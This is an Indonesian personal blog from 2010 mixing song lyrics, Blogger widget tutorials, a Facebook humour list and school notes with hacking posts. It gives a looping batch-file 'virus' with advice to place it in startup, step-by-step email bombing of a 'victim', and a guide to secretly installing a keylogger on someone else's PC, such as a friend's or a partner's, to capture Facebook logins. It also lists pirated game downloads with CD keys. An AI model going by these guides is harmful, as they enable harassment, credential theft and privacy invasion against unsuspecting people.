Latest Entries »

Kamis, April 29, 2010

trik facebook

trik yang uda lama ,tapi jarang banget orang tau

pernah ga setiap lu scroll page facebook kmu,..maka efek cahaya kluar menyilaukan,..

atau setiap kmu ketik kata2 bwat ganti status,.maka setiap huruf yang keluar,..ngeluarin cahaya yang silau,..wow,...emang bisa??

haha

bagi yang blom tau aja....


langsung kita tes ya,..

skarang buka profile loe

lalu lakukan dan pencet tombol2 ini dengan cepat dan tanpa jeda ya..

pencet tombol2 ni dengan cepat =

"atas,atas,bawah,bawah,kir
i,kanan,kiri,kanan,B,A,Enter"

maka loading muncul bntar,,n coba scroll ke atas n bawah page kmu,..ada efek cahaya yang kluar
»»  READMORE...

Selasa, April 27, 2010

ipang _ tentang cindtaa

ni bwad seseorang

sekilas tentang dirimu yang lama ku nanti memikat hatiku jumpa mu pertama kali janji yang pernah terucap tuk satukan hati qta namun tak pernah terjadi

***mungkinkah masih ada waktu yang tersisa untuk ku mungkinkah masih ada cinta di hatimu,,
andaikan saja aku tw kau tak hadirkan cintamu ingin ku melepasmu dengan pelukan ,,,...

sesal yang dtang slalu takkkan membuatmu kembali maavkan aku yang tak pernh tw hingga ssmua_a pun kini tlah berlalu ,, maavkan aku !!!!

***
»»  READMORE...

cara membuat virus berbahaya dengan notepad

halloowwww smuaaa hehehe
{gila mode :: oN}

sekrang saea mw ngajarin bwad virus komputer
langsung aja ke tKP

pertama !!! buka notepaD :DDD

ketikkan sebagai berikutt

@ECHO off
:Begin
msg * - warninggg
msg * udah loe install ulang ajja dahh
msg * kalo g mw banting aja tu komputer
msg * salam hackerzz city * D
msg * wkwkkwkwkw
GOTO BEGIN


simpan dengan ekstensi .BAT
ex ::: citylaphandhe.BAT

pilih all filesss

okee virus qta dah selse tapi ni virus bkal bekerja kalo di klikk

sedikit tipss taroh di starrt upp biar mampus dah tu kompi hhehehehe
»»  READMORE...

Sabtu, April 24, 2010

cara melacak ip seseorang melalui email

Qt sklyan bsa mlihat IPpengirim email ke-q dg mudah.
gini~nih crnya :

ANda login ke yahoo dulu.__stlh anda brd di-inbox, bka sbwah email--lalu tampilkan
email yg pngin dlyat IP-nya.__PERHATIKAN pda bag. knn ats, dstu ada tulisan *Compact Header*--klik bag. itu lalu ganti dg *Full Header*.__Lihat pada bag.
'Received: from' -- disitulah IP si~pengirim...................

ooh ya, klo disitu ada bbrp Received: from dg bbrpa no IP mka IP yg dgnkan adl yg
terakhir_____ & klo g' ada teks Received from, mka pilih IP pertama dalam
*X-orginating-IP*........................
»»  READMORE...

email bomberr

(tanpa basa-basi) lgsg aja bro....: -ingat kita akan menggunakan browser ff bkn yg laen-
1.buka firefox.
2.selanjutnya, kita butuh add-ons yg nmanya reload every n qt bsa mndapatkannya di http://addons.mozilla.org/en-US/firefox/addon/115.
3.lalu klik +ADD TO FIREFOX utk memasangnya.
4.lalu akan muncul peringatan utk nginstal add-ons firefox__klik saja Install Now...n tunggu instalasi selesai.
5.abis itu, bkal muncul prmintaan utk 'restart firefox' klik saja restart firefox.

6.stlh ff tmpil spt sdyakla mka qt bsa mggnkan add-ons tsb. caranya klik kanan pilih reload every n klik bagian enable lalu qt tentukan brp lm reload akan dilakukan tyap wktnya.
7.lgsg aja krim email ke korban, stlh email td brhsil dkrim mka akan muncul psan prxtaan bahwa proses pengiriman berhasil.
8.nahh......skrg qt aktifkan reload every, jika ingin hasil lebih FUN bwt aja waktu lebih kecil, msl: 3 detik.
9.brikutnya qt bakal ditanyain pakah akan mengirimkan kembali pesan, klik YES....

sumber ::: the hackingg
»»  READMORE...

DDos

Serangan DoS (Inggris: denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.
sumber ::: ilmu website
»»  READMORE...

Jumat, April 23, 2010

memasang buku tamu atau shoutmix di blog

memasang sebuah buku tamu (shoutbox/guestbook) pada sebuah blog adalah hal yang cukup lumayan penting,karena buku tamu ini merupakan salah satu sarana untuk berinteraksi antara yang mpunya blog dengan para pengunjung blog. Dengan di pajangnya buku tamu di dalam blog, maka para pengunjung dapat mengungkapkan isi hatinya tentang blog yang anda buat, yang pasti isi dari sebuah buku tamu ini sangatlah bervariasi bisa merupakan pujian, pertanyaan, sekedar iseng, atau ada juga merupakan kritikan terhadap isi blog anda, dan justru dengan adanya variasi itulah membuat blog kita jadi hidup lebih hidu (kaya iklan aja).

Ok, terlalu lama ya, sekarang kita kembali (ke lap...top) ke topikbahasan. Bagaimana caranya mendapatkan sebuah buku tamu. Untuk mendapatkannya sangat mudah, anda tinggal mencarinya pada mesin pencari semisal google ataupun yahoo, silahkan ketikan

kata free shoutbox atau free guestbook pada search engine masing-masing situs, maka dalam beberapa detik saja akan muncul berpuluh-puluh situs penyedia buku tamu tadi, anda tinggal klik lalu coba lihat-lihat. Tapi untuk menghemat waktu pencarian anda, maka di sini saya akan langsung memberikan alamat situs penyedia buku tamu yang servernya lumayan bagus dan jarang sekali mengalami down yakni http://www.shoutmix.com. Untuk caranya silahkan anda ikuti langkah-langkah berikut ini :
1. Seperti biasa anda harus daftar terlebih dahulu dengan cara mengklik tulisan Get One noe, free>>, ataupun dengan mengklik tulisan Sign Up, silahkan anda tulis data-data anda pada form yang telah di sediakan.
2. Jika sudah tedaftar, dan di terima jadi anggota shoutmix, silahkan anda login dengan id anda
3. Pada kolom yang berjudul Style, klik menu appearance.
4. Silahkan klik menu pulldown di samping tulisan Load From Preset untuk mengatur tampilan buku tamu anda, silahkan pilih yang sesuai dengan keinginan anda. Jika sudah selesai klik Save Setting.
5. Untuk mendapatkan kode HTML dari shoutbox anda, silahkan klik Use Shoutbox yang berada di bawah menu Quick Start
6. Klik tulisan Place Shoutbox on web page. Isi lebar dan tinggi shoutbox yang di inginkan
7. Copy seluruh kode HTML yang ada pada text area yang berada di bawah tulisan Generated Codes, lalu simpan di program Notepad anda
8. Klik Log out yang berada di atas layar anda untuk keluar dari halaman shoutmix anda. Silahkan close situs tersebut.
9. Selesai

Untuk menempatkan kode HTML shoutbox tadi pada blog anda, silahkan ikuti langkah-langkah berikut ini.
Untuk blogger dengan template klasik :
1. Log in terlebih dahulu ke blogger.com dengan id anda
2. Klik menu Template
3. Klik Edit HTML
4. Paste kode HTML shoutbox anda yang telah di copy pada notepad tadi di tempat yang anda inginkan
5. Untuk jelasnya saya ambil contoh dengan shoubox milik saya, untuk menempatkannya tinggal klik Edit pada browser lalu pilih Find (on this page).. trus tuliskan kata buku tamu lalu klik find, maka kita akan langsung di bawa ke tulisan tersebut. Jika sudah ketemu tulisan tadi silahkan paste kode HTML shoutbox nya.
6. Klik tombol Preview untuk melihat perubahan yang kita buat.
7. Jika sudah cocok dengan perubahan tadi, klik Save Template Changes
8. Selesai

Sedikit Clue, agar shoutbox anda sesuai dengan ukuran lebar sidebar , anda bisa merubah ukuran lebar ataupun tinggi dari shoutbox , caranya anda tinggal merubah angka Width (untuk lebar) dan Height (untuk tinggi) dari dalam kode HTML shoutbox tersebut.

Untuk Blogger baru :
1. Silahkan Login dengan id anda
2. Klik menu Layout
3. Klik Page Element
4. Klik Add a Page Element
5. Klik tombol Add to Blog yang berada di bawah tulisan HTML/JavaScript
6. Tuliskan judul shoutbox anda pada form title. Contoh : Buku tamu ku, atau my guestbook atau apa saja yang anda suka
7. Copy paste kode HTML shoutbox anda di dalam form Content
8. Klik tombol Save Changes
9. Drag & Drop element yang telah anda buat tadi di tempat yang di sukai
10. Tekan tombol Save
11. Selesai

Selamat mencoba !

Sebagai tambahan, guestbook yang sering dipakai para blogger lainnya :
1. http://oggix.com
Untuk langkah-langkahnya hampir sama dengan langkah diatas.

sumberr :::: the hackingg

»»  READMORE...

Minggu, April 18, 2010

gameee

nie ezra game maav masih sedikit ntar tambah lagy daghh komentt yoo
Need For Speed Carbon
Game Info :
http://www.gamespot.com/pc/driving/needforspeedcarbon/index.html?tag=result;title;0
Game Download :
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_1_of_6.html
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_1_of_6__1.html
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_3_of_6.html
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_4_of_6.html
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_5_of_6.html
http://www.indowebster.com/PC_Game_Need_For_Speed_Carbon_part_6_of_6.html
CD KEY :
LBHZ-X3R5-X8Q6-C2L0-1911
UB4C-Z6HU-V6I4-R1S1-1911
D6JJ-CNQV-F5R7-J1P0-1911
QNGY-WLCY-H5Y5-Z1Y4-1911

Romance Of The Three Kingdoms XI


Game Info :
http://www.gamespot.com/pc/strategy/romanceofthethreekingdomsxi/index.html?tag=result;title;0
Game Download :
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart1rar.html
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart2rar.html
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart3rar.html
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart4rar.html
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart5rar.html
http://www.indowebster.com/Romance_of_The_Three_Kingdoms_XIpart6rar.html
RAR Password : indowebster4ever

Prototype
Game Info :
http://www.gamespot.com/pc/action/prototype/index.html?tag=result;title;2
Game Download :
http://www.megaupload.com/?d=Z0IJ7X7O
http://www.megaupload.com/?d=P260C746
http://www.megaupload.com/?d=1M0AGG9T
http://www.megaupload.com/?d=RGQ5ULJL
http://www.megaupload.com/?d=PQ34HWZW
http://www.megaupload.com/?d=DFCZZSI9
http://www.megaupload.com/?d=F2C8DP8X
http://www.megaupload.com/?d=WJDK5QFK
http://www.megaupload.com/?d=Y4MFPVB9
http://www.megaupload.com/?d=HLJA44S2
http://www.megaupload.com/?d=FJED1R8B
http://www.megaupload.com/?d=OYN9XUKW
http://www.megaupload.com/?d=ROLMNEW9
http://www.megaupload.com/?d=AIBDPASR
http://www.megaupload.com/?d=EWWQBNNX
http://www.megaupload.com/?d=KLNFOP19
http://www.megaupload.com/?d=CDWO7AJH
http://www.megaupload.com/?d=JLZ7GFDB
http://www.megaupload.com/?d=T9WOUH3I
http://www.megaupload.com/?d=BUUCI0TP
http://www.megaupload.com/?d=PQJ8DA2J
http://www.megaupload.com/?d=HSF3UN74
http://www.megaupload.com/?d=SHI5QEK2
http://www.megaupload.com/?d=EMU0SPWH
http://www.megaupload.com/?d=WW20Z4H3
http://www.megaupload.com/?d=QG6ICGSC
http://www.megaupload.com/?d=GHMGAMQ0
http://www.megaupload.com/?d=VRHNYG6H
http://www.megaupload.com/?d=8A08LYLA
http://www.megaupload.com/?d=FYGGYNQZ
http://www.megaupload.com/?d=RM8HQBA4
http://www.megaupload.com/?d=6CCNFTRN
http://www.megaupload.com/?d=5H9G5S23
http://www.megaupload.com/?d=QOST7132
http://www.megaupload.com/?d=QXD9M989
http://www.megaupload.com/?d=KXQ7UYVE
http://www.megaupload.com/?d=TNZVXNTA
http://www.megaupload.com/?d=ZB9W04RF
http://www.megaupload.com/?d=YKWBWRA2
http://www.megaupload.com/?d=UIBH7PLI
http://www.megaupload.com/?d=P7NDUZC2
http://www.megaupload.com/?d=EJPDV8B0
http://www.megaupload.com/?d=ZEGWOJLB
http://www.megaupload.com/?d=GTMVBPJ0
http://www.megaupload.com/?d=JTE05F12
http://www.megaupload.com/?d=64U9W0DG
http://www.megaupload.com/?d=P132NEJN
http://www.megaupload.com/?d=WAD0P3VQ
http://www.megaupload.com/?d=NRX0G06W
http://www.megaupload.com/?d=5B7ELTTD
http://www.megaupload.com/?d=V3VIB1FX
http://www.megaupload.com/?d=N5L5OZG8
http://www.megaupload.com/?d=7UXT3KGD
http://www.megaupload.com/?d=7S5RIWS4
http://www.megaupload.com/?d=5US8Y2A6
http://www.megaupload.com/?d=HHXOBA06
http://www.megaupload.com/?d=NDIUP85Y
http://www.megaupload.com/?d=I2SWLIRL
http://www.megaupload.com/?d=3H6QDGJU
http://www.megaupload.com/?d=GAWD6SCD
http://www.megaupload.com/?d=33J5F008
http://www.megaupload.com/?d=PRVEYAK4
http://www.megaupload.com/?d=CXJD3XAH
http://www.megaupload.com/?d=Q1K18FW1
http://www.megaupload.com/?d=OYOUAP9C
http://www.megaupload.com/?d=7NRW7SLY
http://www.megaupload.com/?d=XTKCZA3M
http://www.megaupload.com/?d=FJ3QED0V
http://www.megaupload.com/?d=6L7CZ5ZT
http://www.megaupload.com/?d=NY42ZK2R
http://www.megaupload.com/?d=MD6S7MUL
http://www.megaupload.com/?d=38E25U2A
http://www.megaupload.com/?d=RF23IKLU
http://www.megaupload.com/?d=QK8J14J1
http://www.megaupload.com/?d=PMRI0N68
http://www.megaupload.com/?d=TK3HGORQ
http://www.megaupload.com/?d=X1M24HMZ
http://www.megaupload.com/?d=SCSIWUUQ
http://www.megaupload.com/?d=0WM3ZEC8

Worms 4 Mayhem
Game Info :
http://www.gamespot.com/pc/strategy/worms4mayhem/index.html?tag=result;title;0
Game Download :
http://www.indowebster.com/b643355bd226f4212a9cabd04a459b84.html

Need For Speed Pro Street
Game Info :
http://www.gamespot.com/pc/driving/needforspeedprostreet/index.html?tag=result;title;0
Game Download :
http://www.indowebster.com/NeedForSpeedPornStreetFiecar_Part_1.html
http://www.indowebster.com/PornStreetFiecar_Part_2.html
http://www.indowebster.com/NeedForSpeedPornStreetFiecar_Part_3.html
http://www.indowebster.com/NeedForSpeedPornStreetFiecarpart4rar.html
http://www.indowebster.com/NeedForSpeedPornStreetFiecarpart5rar.html
http://www.indowebster.com/NeedForSpeedPornStreetFiecarpart6rar.html
http://www.indowebster.com/NeedForSpeedPornStreetFiecarpart7rar.html
sumberr white hat hackk
»»  READMORE...

pasang game di blogg

#

1. Silahkan kunjungi http://www.khemer.com.


2. Silahkan lihat dan coba game-game yang ada dengan cara meng klik pada judul game.


3. Setelah menemukan game yang di rasa cocok, perhatikan ke bagian bawah.


4. Copy kode yang ada pada text area, lalu paste pada notpad atau text editor lainnya, kemudian save dulu di komputer.


5. Sekarang anda mempunyai kode game untuk di pasang di blog.


6. Silahkan close halaman browser anda jika di rasa cukup.


# Langkah #2 :


1. Sign in di blogger dengan ID anda.

2. Klik Layout.

3. Klik tab Elemen Halaman.

4. Klik Tambahkan sebuah Elemen Halaman.

5. Klik tombol TAMBAHKAN KE BLOG di bawah tulisan HTML/JavaScript.

6. Copy kode game yang tadi di dapat, lalu paste pada pop up window yang muncul.

7. Klik tombol SIMPAN PERUBAHAN.

8. Pindahkan elemen yang baru anda buat tadi pada tempat yang di di rasa cocok.

9. Klik tombol SIMPAN yang ada di sebelah atas.

10. Selesai. Silahkan lihat hasilnya!


Untuk template Klasik :

1. Sign in di blogger dengan ID anda.

2. Klik Layout.

3. Klik tab Edit HML.

4. Copy seluruh kode template anda, kemudian paste pada notepad. Silahkan di save dulu untuk backup (sangat penting).

5. Copy kode game yang tadi di dapat, lalu paste pada tempat yang dinginkan.

6. Klik tombol Simpan Perubahan Template.

7. Selesai. Silahkan lihat hasilnya!


Gampang bukan? Selamat mencoba !
SUMBER kolom TUTORIAL
»»  READMORE...

copasss

maavv ini copass dari the hackinngg
Mengenal Teknik-Teknik Hacker
==============================================
Ini hanya sekedar pengetahuan sebagai seorang pengaman informasi untuk mencegah dan mengantisipasi kegitan para hacker sekalian untuk mengenal teknik-teknik hacker. Kalau anda ingin web anda aman dari serangan hacker, anda harus mengenal beberapa teknik yang biasa dilancarkan oleh para hacker.

Eksploit:
=====
Para hacker memanfaatkan celah keamanan pada server target atau kesalahan konfigurasi pada sistem/jaringan.

Serangan Denial-of-service (DoS) :
=====================
Menghancurkan sistem dan membuatnya tidak dapat diakses user lain. Para hacker berusaha membuat crash suatu service atau mesin, membuat jaringan atau hardware sumber menjadi overload, sebagaimana overload pada link, CPU atau mengisi penuh disik.
Beberapa eksploit yang umum digunakan. Kemudian...


CGI script:
======
CGI script merupakan program sisi server yang menjadikan Web site dinamis. Salah satu bentuknya berupa formmail.cgi yang memungkinkan user mengirimkan email ke admin website tanpa menggunakan suatu e-mail client. Serangan lain yang menggunakan CGI script termasuk Cross Site Scripting, SQL Command Injection dan Path Traversal.

Serangan terhadap Web Server:
===================
Banyak sekali webserver yang memiliki celah keamanan. Dua diantaranya Apache pada UNIX dan IIS pada Windows NT yang memiliki pembagian root atau sistem yang rentan. Suatu IIS yang belum dipatch sangat rentan terhadap serangan Traversal direktori UNICODE yang memungkinkan para hacker mampu mengeksekusi file seperi Cmd.exe untuk memperoleh suatu remote shell. Bug umum lainnya berupa Buffer overflow pada request field atau field HTTP lainnya.

Serangan terhadap Web browser
====================
Banyak web browser saat ini memiliki sejumlah celah keamanan. Software yang rentan terhadap format string dan serangan buffer overflow juga ditemukan pada http client (seperti Internet Explorer dan Netscape). Active Content seperti JavaScript, Java, ActiveX dan HTML itu sendiri dapat menjadi resiko keamanan yang serius.
a. HTTP headers
Dapat digunakan untuk mengeksploitasi bug karena beberapa field melewati fungsi-fungsi yang mengharapkan hanya informasi yang pasti. Suatu eksploit yang terkenal untuk IE terdiri dari Encapsulating HTTP header dengan suatu file MEL dan menjalankan file exe yang ditanamkan pada file EML.
b. HTML
Seringkali dapat dieksploitasi melalui Buffer Overflow. Internet Explorer 6 dibuat lebih baik dari versi sebelumnya (juga Netscape) yang tergolong rentan terhadap jenis serangan yang menggunakan tag HTML yang berbeda dengan string panjang sebagai atribut.
c. JavaScript
dikenal sebagai penyebab utama celah keamanan pada web browser. Demikian pula dengan VBScript dan berbagai bahasa script yang lainnya. Fungsi-fungsi ini secara umum dijalankan dalam suatu lingkungan sandbox, yang dari waktu ke waktu para hacker menemukan celah baru untuk menghindari lingkungan sandbox dan mengeksekusi kode, membaca file-file yang sensitif dsb.
c. Frames and iframes
Banyak sekali digunakan sebagai Eksploit Active Scripting (JavaScript, ActiveX, VBScript). Bagaimanapun mereka terkadang digunakan juga sebagai bagian dari social engineering dengan situs-situs asli tapi palsu.
d. Java
dibangun dengan model keamanan yang kuat menggunakan teknologi sandbox. Tapi bagian ketiga telah diimplementasi versinya sendiri yang dapat mengenal bug dan pelanggaran. Secara normal applet java tidak memiliki akses lokal, namun terkadang dapat didayagunakan jika memiliki akses lokal. Pengimplementasian mode ‘trust’ menjadikannya lebih mudah di hack.
e. ActiveX
bahkan lebih berbahaya dibandingkan java yang jarang bekerja dari model ‘trust’ dan menjalankan kode aslinya. Model ‘trust’ terdiri dari salah satunya yang memungkinkan aplikasi ActiveX untuk menjalankan mesin client, atau tidak. Tidak seperti Java, model Active X tidak memiliki cara membatasi aplikasi, hanya beberapa fungsi. Sebagai tindak pencegahan komponen ActiveX secara umum harus ditandai secara digital. Tanda tersebut menyakinkan customer bahwa pembuat komponen ActiveX adalah sah namun tidak berarti bahwa komponen ActiveX aman untuk diinstall.

Access Auditing
==========
Sistem operasi biasanya mendukung log dari login yang gagal, akses file yang gagal, dan yang berhubungan dengan tugas-tugas administratif terutama oleh user account non-administratif.

POP3 and IMAP
=========
Server POP3 dan IMAP dikenal berisikan eksploit yang memungkinkan seorang hacker melancarkan serangan dengan tujuan menebak password dari suatu email address tertentu.

IP spoofing
======
Sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam packet header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti:
a. SMURF Attack
Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service.
b. Prediksi jumlah rangkaian TCP
Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP.
c. Prediksi rangkaian melalui pemalsuan DNS
Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.

Buffer Overflows
==========
Beberapa serangan umum Buffer overflow, diantaranya:
a. Buffer overruns pada kebanyakan Web server
Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar.
b. DNS overflow
Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang. Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan.
c. Serangan DNS
Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker.
d. Mengelabui cache DNS
Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″).

»»  READMORE...

Rabu, April 14, 2010

tipe manusia menurut stat FB

Berikut tipe-tipe manusia berdasarkan status facebook :

1. Manusia Puitis
Dari judulnya udah jelas. Status nya selalu diisi dengan kata-kata mutiara, tapi ga jelas apa maksudnya. Bikin kita terharu? Bikin kita sadar atas pesan tersembunyinya? atau cuma sekedar memancing komentar? Sampai saat ini, tipe orang seperti ini masih dipertanyakan.
Contoh : "Kita masing-masing adalah malaikat bersayap satu. Dan hanya bisa terbang bila saling berpelukan", "Mencintai dan dicintai adalah seperti merasakan sinar matahari dari kedua sisi", "Jika kau hidup sampai seratus tahun, aku ingin hidup seratus tahun kurang sehari, agar aku tidak pernah hidup tanpamu".

2. Manusia Melankolis
Biasanya selalu curhat di status. Entah karena ingin banyak diberi komentar dari teman-temannya atau hanya sekedar menuangkan unek-uneknya ke facebook. Biasany

tipe ini menceritakan kisahnya dan terkadang menanyakan solusi yang terbaik kepada yang lain.
Contoh : "Kamu sakitin aku..lebih baik aku cari yang lain..", "Cuma kamu yang terbaik buat aku..terima kasih kamu sudah sayang ama aku selama ini..".

3. Manusia Super Update
Kapanpun dan di manapun selalu update status. Statusnya tidak terlalu panjang tapi terlihat bikin risih, karena hal-hal yang tidak terlalu penting juga dipublikasikan. Contoh : "Lagi makan di restoran A..", "Dalam perjalanan menuju neraka..", "Saatnya baca koran..", dan sebagainya.

4. Manusia Sok Tau
Sotoy tenarnya. Padahal dia sendiri tidak tahu apa yang ditulisnya. Contoh : "Pemerintah selalu memanjakan rakyatnya.. bla..bla...bla,"

5. Manusia Alay
Ada berbagai macam versi, dari tulisannya yang aneh, atau tulisannya biasa aja, hanya saja kosakata nya ga lazim seperti bahasa alien.
Contoh:
Alay 1 : "DucH Gw4 5aYan9 b6t s4ma Lo..7aNgaN tin69aL!n akYu ya B3!bh..!!"
Alay 2 : "km mugh kog gag pernach ngabwarin aq lagee seech? kmuw maseeh saiangs sama aq gag seech sebenernywa? "
Alay 3 : "Ouh mY 9oD..!! kYknY4w c gW k3ReNz 48ee5h d3ch..!!"(Khusus buat tipe ini, ga usah di baca juga gpp..saya pribadi juga mikirdulu buat nulis ini, walaupun jadinya kurang mirip sama yg aslinya..)

6. Manusia Sombong
Mungkin beberapa dari mereka ga berniat menyombongkan diri, tapi terkadang orang yang melihatnya, yang notabene tidak bisa seberuntung dia, merasa kalo statusnya itu kelewat sombong, dan malah bikin sebel.
Contoh : "Otw ke Paris ..!!", "BMW ku sayang, saatnya kamu mandi..aku mandiin ya sayang..", "Duh, murah-murah banget belanja di Singapur, bow,"

7. Manusia pedagang
Contoh: "jual sepatu bla bla bla"

8. Manusia penyuluh masyarakat
Contoh: "jangan lupa dateng ke TPS, 5 menit utk 5 tahun bla..bla"

9. Manusia Terobsesi
Mengharap tapi ga kesampaian.. pengen jd artis ga dapat-dapat.
Contoh : "duwh... sesi pemotretan lagi! cape..."

10. Manusia Lebay
Updatenya selalu bertema 'gaul' dengan menggunakan bahasa dewa.. ejaan yang dilebaykan..
Contoh.." met moulnin all.. pagiiieh yg cewrah... xixiixi"

11. Manusia in English
Tipe manusianya bisa seperti apa saja, apakah melankolis, puitis, sombong dan sebagainya. Tapi dia berusaha lebih keren dengan mengatakannya dalam bahasa Inggwis gicyu Low..
Contoh : "Tie and Chair..", "I can tooth, you Pink sun.." dsb..

12. Manusia Tukang Ngeluh
Pagi, siang, malem, semuanya selalu ada aja yang dikeluhkan.
Contoh : " Jakarta maceeet..!! Panas pula..", "Aaaargh ujan, padahal baru nyuci mobil..sialan. .!!", "Males ngapa2in.. cape hati gara2 si do' i..", dsb.

Kalian yang mana???

Tulisan ini hanyalah sebuah humor belaka apabila ada kesamaan, mohon dimaklumi, ok coy semoga bisa tersenyum.


sumber ::: id-facebokk.blogspot.com
»»  READMORE...

cara menggunakan keylogger

sobat sekarang saya mau share tentang keylogger semua
Bagi facebook'er yang belum mempunyai keylogger, bisa download secara gratis di http://www.indowebster.com/ Sebenarnya software keylogger itu macam-macam namanya. Yang saya gunakan yaitu keylogger yang bernama DOUGLAS 1.1.

Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri ... hahahaha

Kalau sudah pasti, sekarang gw jelasin dah cara penggunaan'nya.

1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .

2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol ... hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi ...

3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho

4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!

5. Kalau proses penginstalan sudah selesai, terus ???

Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha

Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja ... hahaha

Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda ...

Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.

Nah, Selese dah !!! Mudah to ???

Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut. PAHAM ????

Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 ... Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu ... hahahaha
sumber : id-facebook.blogspot.com
»»  READMORE...

demokrasi

ini adalah isi tugas dari guru pKN gw ,,, isina adalah
TUGAS PKN
DEMOKRAI MENURUT IDEOLOGI
Menurut cara penyaluran kehendak rakyat, demokrasi dibedakan atas :
• Demokrasi Langsung
